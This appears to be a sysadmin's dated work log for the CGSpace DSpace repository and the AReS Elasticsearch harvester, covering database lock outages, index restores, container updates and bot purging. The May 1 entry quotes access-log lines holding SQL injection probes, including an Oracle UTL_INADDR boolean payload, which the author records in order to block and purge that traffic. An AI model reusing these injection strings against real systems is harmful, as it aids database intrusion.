+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+10504
+
    +
  • I had to go to bed and I bet it will crash and be down for hours until I wake up…
  • +
  • What the hell is this user agent?
  • +
+
54.197.119.143 - - [06/Apr/2021:19:18:11 +0200] "GET /handle/10568/16499 HTTP/1.1" 499 0 "-" "GetUrl/1.0 wdestiny@umich.edu (Linux)"
+

2021-04-07

+
    +
  • CGSpace was still down from last night of course, with tons of database locks:
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+12168
+
    +
  • I restarted the server again and the locks came back
  • +
  • Atmire responded to the message from yesterday +
      +
    • They noticed something in the logs about emails failing to be sent
    • +
    • There appears to be an issue sending mails on workflow tasks when a user in that group has an invalid email address:
    • +
    +
  • +
+
2021-04-01 12:45:11,414 WARN  org.dspace.workflowbasic.BasicWorkflowServiceImpl @ a.akwarandu@cgiar.org:session_id=2F20F20D4A8C36DB53D42DE45DFA3CCE:notifyGroupofTask:cannot email user group_id=aecf811b-b7e9-4b6f-8776-3d372e6a048b workflow_item_id=33085\colon;  Invalid Addresses (com.sun.mail.smtp.SMTPAddressFailedException\colon; 501 5.1.3 Invalid address
+
    +
  • The issue is not the named user above, but a member of the group…
  • +
  • And the group does have users with invalid email addresses (probably accounts created automatically after authenticating with LDAP):
  • +
+

DSpace group

+
    +
  • I extracted all the group IDs from recent logs that had users with invalid email addresses:
  • +
+
$ grep -a -E 'email user group_id=\b[0-9a-f]{8}\b-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-\b[0-9a-f]{12}\b' /home/cgspace.cgiar.org/log/dspace.log.* | grep -o -E '\b[0-9a-f]{8}\b-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-\b[0-9a-f]{12}\b' | sort | uniq
+0a30d6ae-74a6-4eee-a8f5-ee5d15192ee6
+1769137c-36d4-42b2-8fec-60585e110db7
+203c8614-8a97-4ac8-9686-d9d62cb52acc
+294603de-3d09-464e-a5b0-09e452c6b5ab
+35878555-9623-4679-beb8-bb3395fdf26e
+3d8a5efa-5509-4bf9-9374-2bc714aceb99
+4238208a-f848-47cb-9dd2-43f9f954a4af
+44939b84-1894-41e7-b3e6-8c8d1781057b
+49ba087e-75a3-45ce-805c-69eeda0f786b
+4a6606ce-0284-421d-bf80-4dafddba2d42
+527de6aa-9cd0-4988-bf5f-c9c92ba2ac10
+54cd1b16-65bf-4041-9d84-fb2ea3301d6d
+58982847-5f7c-4b8b-a7b0-4d4de702136e
+5f0b85be-bd23-47de-927d-bca368fa1fbc
+646ada17-e4ef-49f6-9378-af7e58596ce1
+7e2f4bf8-fbc9-4b2f-97a4-75e5427bef90
+8029fd53-f9f5-4107-bfc3-8815507265cf
+81faa934-c602-4608-bf45-de91845dfea7
+8611a462-210c-4be1-a5bb-f87a065e6113
+8855c903-ef86-433c-b0be-c12300eb0f84
+8c7ece98-3598-4de7-a885-d61fd033bea8
+8c9a0d01-2d12-4a99-84f9-cdc25ac072f9
+8f9f888a-b501-41f3-a462-4da16150eebf
+94168f0e-9f45-4112-ac8d-3ba9be917842
+96998038-f381-47dc-8488-ff7252703627
+9768f4a8-3018-44e9-bf58-beba4296327c
+9a99e8d2-558e-4fc1-8011-e4411f658414
+a34e6400-78ed-45c0-a751-abc039eed2e6
+a9da5af3-4ec7-4a9b-becb-6e3d028d594d
+abf5201c-8be5-4dee-b461-132203dd51cb
+adb5658c-cef3-402f-87b6-b498f580351c
+aecf811b-b7e9-4b6f-8776-3d372e6a048b
+ba5aae61-ea34-4ac1-9490-4645acf2382f
+bf7f3638-c7c6-4a8f-893d-891a6d3dafff
+c617ada0-09d1-40ed-b479-1c4860a4f724
+cff91d44-a855-458c-89e5-bd48c17d1a54
+e65171ae-a2bf-4043-8f54-f8457bc9174b
+e7098b40-4701-4ca2-b9a9-3a1282f67044
+e904f122-71dc-439b-b877-313ef62486d7
+ede59734-adac-4c01-8691-b45f19088d37
+f88bd6bb-f93f-41cb-872f-ff26f6237068
+f985f5fb-be5c-430b-a8f1-cf86ae4fc49a
+fe800006-aaec-4f9e-9ab4-f9475b4cbdc3
+

2021-04-08

+
    +
  • I can’t believe it but the server has been down for twelve hours or so +
      +
    • The locks have not changed since I went to bed last night:
    • +
    +
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+12070
+
    +
  • I restarted PostgreSQL and Tomcat and the locks go straight back up!
  • +
+
$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+13
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+986
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+1194
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+1212
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+1489
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+2124
+$ psql -c 'SELECT * FROM pg_locks pl LEFT JOIN pg_stat_activity psa ON pl.pid = psa.pid;' | wc -l
+5934
+

2021-04-09

+
    +
  • Atmire managed to get CGSpace back up by killing all the PostgreSQL connections yesterday +
      +
    • I don’t know how they did it…
    • +
    • They also think it’s weird that restarting PostgreSQL didn’t kill the connections
    • +
    • They asked some more questions, like for example if there were also issues on DSpace Test
    • +
    • Strangely enough, I checked DSpace Test and noticed a clear spike in PostgreSQL locks on the morning of April 6th as well!
    • +
    +
  • +
+

PostgreSQL locks week CGSpace +PostgreSQL locks week DSpace Test

+
    +
  • I definitely need to look into that!
  • +
+

2021-04-11

+
    +
  • I am trying to resolve the AReS Elasticsearch index issues that happened last week +
      +
    • I decided to back up the openrxv-items index to openrxv-items-backup and then delete all the others:
    • +
    +
  • +
+
$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-backup
+$ curl -X PUT "localhost:9200/openrxv-items/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": false}}'
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
+
    +
  • Then I updated all Docker containers and rebooted the server (linode20) so that the correct indexes would be created again:
  • +
+
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
+
    +
  • Then I realized I have to clone the backup index directly to openrxv-items-final, and re-create the openrxv-items alias:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
+$ curl -X PUT "localhost:9200/openrxv-items-backup/_settings" -H 'Content-Type: application/json' -d'{"settings": {"index.blocks.write": true}}'
+$ curl -s -X POST http://localhost:9200/openrxv-items-backup/_clone/openrxv-items-final
+$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
+
    +
  • Now I see both openrxv-items-final and openrxv-items have the current number of items:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'     
+{
+  "count" : 103373,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+$ curl -s 'http://localhost:9200/openrxv-items-final/_count?q=*&pretty'
+{
+  "count" : 103373,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+
    +
  • Then I started a fresh harvesting in the AReS Explorer admin dashboard
  • +
+

2021-04-12

+
    +
  • The harvesting on AReS finished last night, but the indexes got messed up again +
      +
    • I will have to fix them manually next time…
    • +
    +
  • +
+

2021-04-13

+
    +
  • Looking into the logs on 2021-04-06 on CGSpace and DSpace Test to see if there is anything specific that stands out about the activity on those days that would cause the PostgreSQL issues +
      +
    • Digging into the Munin graphs for the last week I found a few other things happening on that morning:
    • +
    +
  • +
+

/dev/sda disk latency week +JVM classes unloaded week +Nginx status week

+
    +
  • 13,000 requests in the last two months from a user with user agent SomeRandomText, for example:
  • +
+
84.33.2.97 - - [06/Apr/2021:06:25:13 +0200] "GET /bitstream/handle/10568/77776/CROP%20SCIENCE.jpg.jpg HTTP/1.1" 404 10890 "-" "SomeRandomText"
+
    +
  • I purged them:
  • +
+
$ ./ilri/check-spider-hits.sh -f /tmp/agents.txt -p
+Purging 13159 hits from SomeRandomText in statistics
+
+Total number of bot hits purged: 13159
+
    +
  • I noticed there were 78 items submitted in the hour before CGSpace crashed:
  • +
+
# grep -a -E '2021-04-06 0(6|7):' /home/cgspace.cgiar.org/log/dspace.log.2021-04-06 | grep -c -a add_item 
+78
+
    +
  • Of those 78, 77 of them were from Udana
  • +
  • Compared to other mornings (0 to 9 AM) this month that seems to be pretty high:
  • +
+
# for num in {01..13}; do grep -a -E "2021-04-$num 0" /home/cgspace.cgiar.org/log/dspace.log.2021-04-$num | grep -c -a
+ add_item; done
+32
+0
+0
+2
+8
+108
+4
+0
+29
+0
+1
+1
+2
+

2021-04-15

+
    +
  • Release v1.4.2 of the DSpace Statistics API on GitHub: https://github.com/ilri/dspace-statistics-api/releases/tag/v1.4.2 +
      +
    • This has been running on DSpace Test for the last week or so, and mostly contains the Falcon 3.0.0 changes
    • +
    +
  • +
  • Re-sync DSpace Test with data from CGSpace +
      +
    • Run system updates on DSpace Test (linode26) and reboot the server
    • +
    +
  • +
  • Update the PostgreSQL JDBC driver on DSpace Test (linode26) to 42.2.19 +
      +
    • It has been a few months since we updated this, and there have been a few releases since 42.2.14 that we are currently using
    • +
    +
  • +
  • Create a test account for Rafael from Bioversity-CIAT to submit some items to DSpace Test:
  • +
+
$ dspace user -a -m tip-submit@cgiar.org -g CIAT -s Submit -p 'fuuuuuuuu'
+
    +
  • I added the account to the Alliance Admins group, which should allow him to submit to any Alliance collection +
      +
    • According to my notes from 2020-10 the account must be in the admin group in order to submit via the REST API
    • +
    +
  • +
+

2021-04-18

+
    +
  • Update all containers on AReS (linode20):
  • +
+
$ docker images | grep -v ^REPO | sed 's/ \+/:/g' | cut -d: -f1,2 | xargs -L1 docker pull
+
    +
  • Then run all system updates and reboot the server
  • +
  • I learned a new command for Elasticsearch:
  • +
+
$ curl http://localhost:9200/_cat/indices
+yellow open openrxv-values           ChyhGwMDQpevJtlNWO1vcw 1 1   1579      0 537.6kb 537.6kb
+yellow open openrxv-items-temp       PhV5ieuxQsyftByvCxzSIw 1 1 103585 104372 482.7mb 482.7mb
+yellow open openrxv-shared           J_8cxIz6QL6XTRZct7UBBQ 1 1    127      0 115.7kb 115.7kb
+yellow open openrxv-values-00001     jAoXTLR0R9mzivlDVbQaqA 1 1   3903      0 696.2kb 696.2kb
+green  open .kibana_task_manager_1   O1zgJ0YlQhKCFAwJZaNSIA 1 0      2      2  20.6kb  20.6kb
+yellow open openrxv-users            1hWGXh9kS_S6YPxAaBN8ew 1 1      5      0  28.6kb  28.6kb
+green  open .apm-agent-configuration f3RAkSEBRGaxJZs3ePVxsA 1 0      0      0    283b    283b
+yellow open openrxv-items-final      sgk-s8O-RZKdcLRoWt3G8A 1 1    970      0   2.3mb   2.3mb
+green  open .kibana_1                HHPN7RD_T7qe0zDj4rauQw 1 0     25      7  36.8kb  36.8kb
+yellow open users                    M0t2LaZhSm2NrF5xb64dnw 1 1      2      0  11.6kb  11.6kb
+
    +
  • Somehow the openrxv-items-final index only has a few items and the majority are in openrxv-items-temp, via the openrxv-items alias (which is in the temp index):
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty' 
+{
+  "count" : 103585,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+
    +
  • I found a cool tool to help with exporting and restoring Elasticsearch indexes:
  • +
+
$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
+$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --limit=1000 --type=data
+...
+Sun, 18 Apr 2021 06:27:07 GMT | Total Writes: 103585
+Sun, 18 Apr 2021 06:27:07 GMT | dump complete
+
    +
  • It took only two or three minutes to export everything…
  • +
  • I did a test to restore the index:
  • +
+
$ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-test --type=mapping
+$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items-test --limit 1000 --type=data
+
    +
  • So that’s pretty cool!
  • +
  • I deleted the openrxv-items-final index and openrxv-items-temp indexes and then restored the mappings to openrxv-items-final, added the openrxv-items alias, and started restoring the data to openrxv-items with elasticdump:
  • +
+
$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
+$ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
+$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
+$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items --limit 1000 --type=data
+
    +
  • AReS seems to be working fine after that, so I created the openrxv-items-temp index and then started a fresh harvest on AReS Explorer:
  • +
+
$ curl -X PUT "localhost:9200/openrxv-items-temp"
+
    +
  • Run system updates on CGSpace (linode18) and run the latest Ansible infrastructure playbook to update the DSpace Statistics API, PostgreSQL JDBC driver, etc, and then reboot the system
  • +
  • I wasted a bit of time trying to get TSLint and then ESLint running for OpenRXV on GitHub Actions
  • +
+

2021-04-19

+
    +
  • The AReS harvesting last night seems to have completed successfully, but the number of results is strange:
  • +
+
$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
+yellow open openrxv-items-temp       kNUlupUyS_i7vlBGiuVxwg 1 1 103741 105553 483.6mb 483.6mb
+yellow open openrxv-items-final      HFc3uytTRq2GPpn13vkbmg 1 1    970      0   2.3mb   2.3mb
+
    +
  • The indices endpoint doesn’t include the openrxv-items alias, but it is currently in the openrxv-items-temp index so the number of items is the same:
  • +
+
$ curl -s 'http://localhost:9200/openrxv-items/_count?q=*&pretty'     
+{
+  "count" : 103741,
+  "_shards" : {
+    "total" : 1,
+    "successful" : 1,
+    "skipped" : 0,
+    "failed" : 0
+  }
+}
+
    +
  • A user was having problems resetting their password on CGSpace, with some message about SMTP etc +
      +
    • I checked and we are indeed locked out of our mailbox:
    • +
    +
  • +
+
$ dspace test-email
+...
+Error sending email:
+ - Error: javax.mail.SendFailedException: Send failure (javax.mail.AuthenticationFailedException: 550 5.2.1 Mailbox cannot be accessed [PR0P264CA0280.FRAP264.PROD.OUTLOOK.COM]
+)
+
+

2021-04-21

+
    +
  • Send Abdullah feedback on the filter on click pull request for OpenRXV +
      +
    • I see it adds a new “allow filter on click” checkbox in the layout settings, but it doesn’t modify the filters
    • +
    • Also, it seems to have broken the existing clicking of the countries on the map
    • +
    +
  • +
  • Atmire recently sent feedback about the CUA duplicates processor +
      +
    • Last month when I ran it, it got stuck on the storage reports, apparently, so I will try again (with a fresh Solr statistics core from production) and skip the storage reports (-g):
    • +
    +
  • +
+
$ export JAVA_OPTS='-Dfile.encoding=UTF-8 -Xmx2048m'
+$ cp atmire-cua-update.xml-20210124-132112.old /home/dspacetest.cgiar.org/config/spring/api/atmire-cua-update.xml
+$ chrt -b 0 dspace dsrun com.atmire.statistics.util.update.atomic.AtomicStatisticsUpdateCLI -r 100 -c statistics -t 12 -g
+
    +
  • The first run processed 1,439 docs, the second run processed 0 docs +
      +
    • I’m not sure if that means that it worked? I sent feedback to Atmire
    • +
    +
  • +
  • Meeting with Moayad to discuss OpenRXV development progress
  • +
+

2021-04-25

+
    +
  • The indexes on AReS are messed up again +
      +
    • I made a backup of the indexes, then deleted the openrxv-items-final and openrxv-items-temp indexes, re-created the openrxv-items alias, and restored the data into openrxv-items:
    • +
    +
  • +
+
$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_mapping.json --type=mapping
+$ elasticdump --input=http://localhost:9200/openrxv-items --output=/home/aorth/openrxv-items_data.json --limit=1000 --type=data
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-temp'
+$ curl -XDELETE 'http://localhost:9200/openrxv-items-final'
+$ elasticdump --input=/home/aorth/openrxv-items_mapping.json --output=http://localhost:9200/openrxv-items-final --type=mapping
+$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions" : [{"add" : { "index" : "openrxv-items-final", "alias" : "openrxv-items"}}]}'
+$ elasticdump --input=/home/aorth/openrxv-items_data.json --output=http://localhost:9200/openrxv-items --limit 1000 --type=data
+
    +
  • Then I started a fresh AReS harvest
  • +
+

2021-04-26

+
    +
  • The AReS harvest last night seems to have finished successfully and the number of items looks good:
  • +
+
$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
+yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1      0 0    283b    283b
+yellow open openrxv-items-final      ul3SKsa7Q9Cd_K7qokBY_w 1 1 103951 0   254mb   254mb
+
    +
  • And the aliases seem correct for once:
  • +
+
$ curl -s 'http://localhost:9200/_alias/' | python -m json.tool
+...
+    "openrxv-items-final": {
+        "aliases": {
+            "openrxv-items": {}
+        }
+    },
+    "openrxv-items-temp": {
+        "aliases": {}
+    },
+...
+
    +
  • That’s 250 new items in the index since the last harvest!
  • +
  • Re-create my local Artifactory container because I’m getting errors starting it and it has been a few months since it was updated:
  • +
+
$ podman rm artifactory
+$ podman pull docker.bintray.io/jfrog/artifactory-oss:latest
+$ podman create --ulimit nofile=32000:32000 --name artifactory -v artifactory_data:/var/opt/jfrog/artifactory -p 8081-8082:8081-8082 docker.bintray.io/jfrog/artifactory-oss
+$ podman start artifactory
+
    +
  • Start testing DSpace 7.0 Beta 5 so I can evaluate if it solves some of the problems we are having on DSpace 6, and if it’s missing things like multiple handle resolvers, etc +
      +
    • I see it needs Java JDK 11, Tomcat 9, Solr 8, and PostgreSQL 11
    • +
    • Also, according to the installation notes I see you can install the old DSpace 6 REST API, so that’s potentially useful for us
    • +
    • I see that all web applications on the backend are now rolled into just one “server” application
    • +
    • The build process took 11 minutes the first time (due to downloading the world with Maven) and ~2 minutes the second time
    • +
    • The local.cfg content and syntax is very similar to DSpace 6's (a minimal sketch is below)
    • +
    +
  • +
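  • For reference, a minimal local.cfg sketch for a test install like this (the property names are standard DSpace 7 ones, but apart from the install path and database name mentioned above, the values here are assumptions):

# local.cfg (sketch)
dspace.dir = /home/aorth/dspace7b5
dspace.server.url = http://localhost:8080/server
dspace.ui.url = http://localhost:4000
db.url = jdbc:postgresql://localhost:5432/dspace7b5
db.username = dspace
db.password = fuuu
solr.server = http://localhost:8983/solr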
  • I got the basic fresh_install up and running +
      +
    • Then I tried to import a DSpace 6 database from production
    • +
    +
  • +
  • I tried to delete all the Atmire SQL migrations:
  • +
+
localhost/dspace7b5= > DELETE FROM schema_version WHERE description LIKE '%Atmire%' OR description LIKE '%CUA%' OR description LIKE '%cua%';
+
    +
  • But I got an error when running dspace database migrate:
  • +
+
$ ~/dspace7b5/bin/dspace database migrate
+
+Database URL: jdbc:postgresql://localhost:5432/dspace7b5
+Migrating database to latest version... (Check dspace logs for details)
+Migration exception:
+java.sql.SQLException: Flyway migration error occurred
+        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:738)
+        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:632)
+        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:228)
+        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.base/java.lang.reflect.Method.invoke(Method.java:566)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:273)
+        at org.dspace.app.launcher.ScriptLauncher.handleScript(ScriptLauncher.java:129)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:94)
+Caused by: org.flywaydb.core.api.FlywayException: Validate failed: 
+Detected applied migration not resolved locally: 5.0.2017.09.25
+Detected applied migration not resolved locally: 6.0.2017.01.30
+Detected applied migration not resolved locally: 6.0.2017.09.25
+
+        at org.flywaydb.core.Flyway.doValidate(Flyway.java:292)
+        at org.flywaydb.core.Flyway.access$100(Flyway.java:73)
+        at org.flywaydb.core.Flyway$1.execute(Flyway.java:166)
+        at org.flywaydb.core.Flyway$1.execute(Flyway.java:158)
+        at org.flywaydb.core.Flyway.execute(Flyway.java:527)
+        at org.flywaydb.core.Flyway.migrate(Flyway.java:158)
+        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:729)
+        ... 9 more
+
    +
  • I deleted those migrations:
  • +
+
localhost/dspace7b5= > DELETE FROM schema_version WHERE version IN ('5.0.2017.09.25', '6.0.2017.01.30', '6.0.2017.09.25');
+
    +
  • Then when I ran the migration again it failed for a new reason, related to the configurable workflow:
  • +
+
Database URL: jdbc:postgresql://localhost:5432/dspace7b5
+Migrating database to latest version... (Check dspace logs for details)
+Migration exception:
+java.sql.SQLException: Flyway migration error occurred
+        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:738)
+        at org.dspace.storage.rdbms.DatabaseUtils.updateDatabase(DatabaseUtils.java:632)
+        at org.dspace.storage.rdbms.DatabaseUtils.main(DatabaseUtils.java:228)
+        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
+        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
+        at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
+        at java.base/java.lang.reflect.Method.invoke(Method.java:566)
+        at org.dspace.app.launcher.ScriptLauncher.runOneCommand(ScriptLauncher.java:273)
+        at org.dspace.app.launcher.ScriptLauncher.handleScript(ScriptLauncher.java:129)
+        at org.dspace.app.launcher.ScriptLauncher.main(ScriptLauncher.java:94)
+Caused by: org.flywaydb.core.internal.command.DbMigrate$FlywayMigrateException:
+Migration V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql failed
+--------------------------------------------------------------------
+SQL State  : 42P01
+Error Code : 0
+Message    : ERROR: relation "cwf_pooltask" does not exist
+  Position: 8
+Location   : org/dspace/storage/rdbms/sqlmigration/postgres/V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql (/home/aorth/src/apache-tomcat-9.0.45/file:/home/aorth/dspace7b5/lib/dspace-api-7.0-beta5.jar!/org/dspace/storage/rdbms/sqlmigration/postgres/V7.0_2019.05.02__DS-4239-workflow-xml-migration.sql)
+Line       : 16
+Statement  : UPDATE cwf_pooltask SET workflow_id='defaultWorkflow' WHERE workflow_id='default'
+...
+
  • To get past that, I ran the migration again with the ignored option:
+
$ ~/dspace7b5/bin/dspace database migrate ignored
+
    +
  • Now I see all migrations have completed and DSpace actually starts up fine!
  • +
  • I will try to do a full re-index to see how long it takes:
  • +
+
$ time ~/dspace7b5/bin/dspace index-discovery -b
+...
+~/dspace7b5/bin/dspace index-discovery -b  25156.71s user 64.22s system 97% cpu 7:11:09.94 total
+
    +
  • Not good, that shit took almost seven hours!
  • +
+

2021-04-27

+
    +
  • Peter sent me a list of 500+ DOIs from CGSpace with no Altmetric score +
      +
    • I used csvgrep (with Windows encoding!) to extract those without our handle and save the DOIs to a text file, then got their handles with my doi-to-handle.py script:
    • +
    +
  • +
+
$ csvgrep -e 'windows-1252' -c 'Handle.net IDs' -i -m '10568/' ~/Downloads/Altmetric\ -\ Research\ Outputs\ -\ CGSpace\ -\ 2021-04-26.csv | csvcut -c DOI | sed '1d' > /tmp/dois.txt
+$ ./ilri/doi-to-handle.py -i /tmp/dois.txt -o /tmp/handles.csv -db dspace63 -u dspace -p 'fuuu' -d
+
    +
  • He will Tweet them…
  • +
+

2021-04-28

+
    +
  • Grant some IWMI colleagues access to the Atmire Content and Usage stats on CGSpace
  • +

May, 2021

+ +
+

2021-05-01

+
    +
  • I looked at the top user agents and IPs in the Solr statistics for last month and I see these user agents: +
      +
    • “RI/1.0”, 1337
    • +
    • “Microsoft Office Word 2014”, 941
    • +
    +
  • +
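  • For reference, this is roughly how I pull the top user agents out of the statistics core (a sketch using Solr faceting on the userAgent field for last month; the exact query I ran may have differed):

$ curl -s 'http://localhost:8081/solr/statistics/select?q=time:[2021-04-01T00:00:00Z+TO+2021-04-30T23:59:59Z]&rows=0&facet=true&facet.field=userAgent&facet.limit=20&wt=json&indent=true'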
  • I will add the RI/1.0 pattern to our local DSpace agents override and purge them from Solr (we had previously seen this agent with 9,000 hits or so in 2020-09), but I think I will leave the Microsoft Word one… as that’s an actual user…
  • +
+
    +
  • I should probably add the RI/1.0 pattern to the COUNTER-Robots project
  • +
  • As well as these IPs: +
      +
    • 193.169.254.178, 21648
    • +
    • 181.62.166.177, 20323
    • +
    • 45.146.166.180, 19376
    • +
    +
  • +
  • The first IP seems to be in Estonia and their requests to the REST API change user agents from curl to Mac OS X to Windows and more +
      +
    • Also, they seem to be trying to exploit something:
    • +
    +
  • +
+
193.169.254.178 - - [21/Apr/2021:01:59:01 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata\x22%20and%20\x2221\x22=\x2221 HTTP/1.1" 400 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
+193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata-21%2B21*01 HTTP/1.1" 200 458201 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
+193.169.254.178 - - [21/Apr/2021:02:00:36 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata'||lower('')||' HTTP/1.1" 400 5 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
+193.169.254.178 - - [21/Apr/2021:02:02:10 +0200] "GET /rest/collections/1179/items?limit=812&expand=metadata'%2Brtrim('')%2B' HTTP/1.1" 200 458209 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
+
    +
  • I will report the IP on abuseipdb.com and purge their hits from Solr
  • +
  • The second IP is in Colombia and is making thousands of requests for what looks like some test site:
  • +
+
181.62.166.177 - - [20/Apr/2021:22:48:42 +0200] "GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0" 200 123613 "http://cassavalighthousetest.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36"
+181.62.166.177 - - [20/Apr/2021:22:55:39 +0200] "GET /rest/collections/d1e11546-c62a-4aee-af91-fd482b3e7653/items?expand=metadata HTTP/2.0" 200 123613 "http://cassavalighthousetest.org/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.128 Safari/537.36"
+
    +
  • But this site does not exist (yet?) +
      +
    • I will purge them from Solr
    • +
    +
  • +
  • The third IP is in Russia apparently, and the user agent has the pl-PL locale with thousands of requests like this:
  • +
+
45.146.166.180 - - [18/Apr/2021:16:28:44 +0200] "GET /bitstream/handle/10947/4153/.AAS%202014%20Annual%20Report.pdf?sequence=1%22%29%29%20AND%201691%3DUTL_INADDR.GET_HOST_ADDRESS%28CHR%28113%29%7C%7CCHR%28118%29%7C%7CCHR%28113%29%7C%7CCHR%28106%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%281691%3D1691%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%28122%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%29%20AND%20%28%28%22RKbp%22%3D%22RKbp&isAllowed=y HTTP/1.1" 200 918998 "http://cgspace.cgiar.org:80/bitstream/handle/10947/4153/.AAS 2014 Annual Report.pdf" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL) AppleWebKit/523.15 (KHTML, like Gecko) Version/3.0 Safari/523.15"
+
    +
  • I will purge these all with my check-spider-ip-hits.sh script:
  • +
+
$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips.txt -p
+Purging 21648 hits from 193.169.254.178 in statistics
+Purging 20323 hits from 181.62.166.177 in statistics
+Purging 19376 hits from 45.146.166.180 in statistics
+
+Total number of bot hits purged: 61347
+

2021-05-02

+
    +
  • Check the AReS Harvester indexes:
  • +
+
$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
+yellow open openrxv-items-temp       H-CGsyyLTaqAj6-nKXZ-7w 1 1      0 0    283b    283b
